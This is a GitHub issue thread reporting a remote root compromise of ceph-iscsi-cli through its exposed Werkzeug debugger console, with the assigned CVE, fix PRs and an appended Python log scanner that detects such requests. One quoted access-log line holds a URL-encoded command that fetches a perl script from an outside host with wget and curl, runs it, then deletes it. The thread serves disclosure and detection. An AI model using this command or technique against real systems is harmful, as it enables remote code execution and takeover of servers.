Closed realasmo closed 6 years ago
@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP.
The end of the logfile contains __debugger__=yes, so this may (or may not) be related:
Flask is enabling the Werkzeug debugger here [1]
[1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007
CVE-2018-14649 has been assigned for this flaw
See PR #121
Resolved -- also https://github.com/ceph/ceph/pull/24248 includes a documentation update to note that this API should not be publicly accessible.
CVE-2018-14649 was assigned to this issue.
See also rh#1632078 for additional information.
Hello,
I've found that the Python code was used to compromise our host remotely (in our case it was running as root, so the attacker gained root privileges); the logs contain:
2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -
Hope this helps.
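As an added detection example, not part of this issue or of the ceph-iscsi-cli code: a small scanner over Werkzeug access-log lines of the shape quoted in the report above, flagging requests aimed at the debugger console. The sample lines, the request paths and the RFC 5737 addresses are constructed for the example; the cmd value is a placeholder.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shape of the Werkzeug access-log line quoted in the report:
# <ts> INFO [...] - <client ip> - - [<date>] "<method> <target> HTTP/x.y" <status> -
LOG_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def classify(line):
    """Return (client_ip, verdict) for one access-log line, or None if unparseable."""
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    qs = parse_qs(url.query)
    status = int(m.group("status"))
    console = url.path == "/console"
    debugger_flag = qs.get("__debugger__", [""])[0] == "yes"
    if console and debugger_flag and "cmd" in qs:
        # A command was submitted to the debugger console. HTTP 200 means the
        # debugger answered it, i.e. debug mode was on and reachable.
        verdict = "console-command-served" if status == 200 else "console-command-rejected"
    elif console or debugger_flag:
        verdict = "debugger-probe"
    else:
        verdict = "benign"
    return m.group("ip"), verdict

def scan(lines):
    """Return the non-benign findings for a batch of log lines."""
    findings = []
    for line in lines:
        result = classify(line)
        if result and result[1] != "benign":
            findings.append(result)
    return findings

# Constructed sample lines: RFC 5737 documentation addresses (not the ones in the
# report), a placeholder cmd value, and an assumed /api/config path for normal traffic.
PREFIX = "2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - "
SAMPLE_LOG = [
    PREFIX + '203.0.113.7 - - [23/Sep/2018 05:23:53] "GET /console?s=EXAMPLESECRET&cmd=REDACTED&__debugger__=yes&frm=0 HTTP/1.1" 200 -',
    PREFIX + '198.51.100.9 - - [23/Sep/2018 05:24:10] "GET /console HTTP/1.1" 404 -',
    PREFIX + '192.0.2.4 - - [23/Sep/2018 05:25:00] "GET /api/config HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A 404 for /console, as in the second sample line, is what a host with the debugger disabled returns; a 200 for a /console request carrying __debugger__=yes and a cmd parameter means the console was live and served the command.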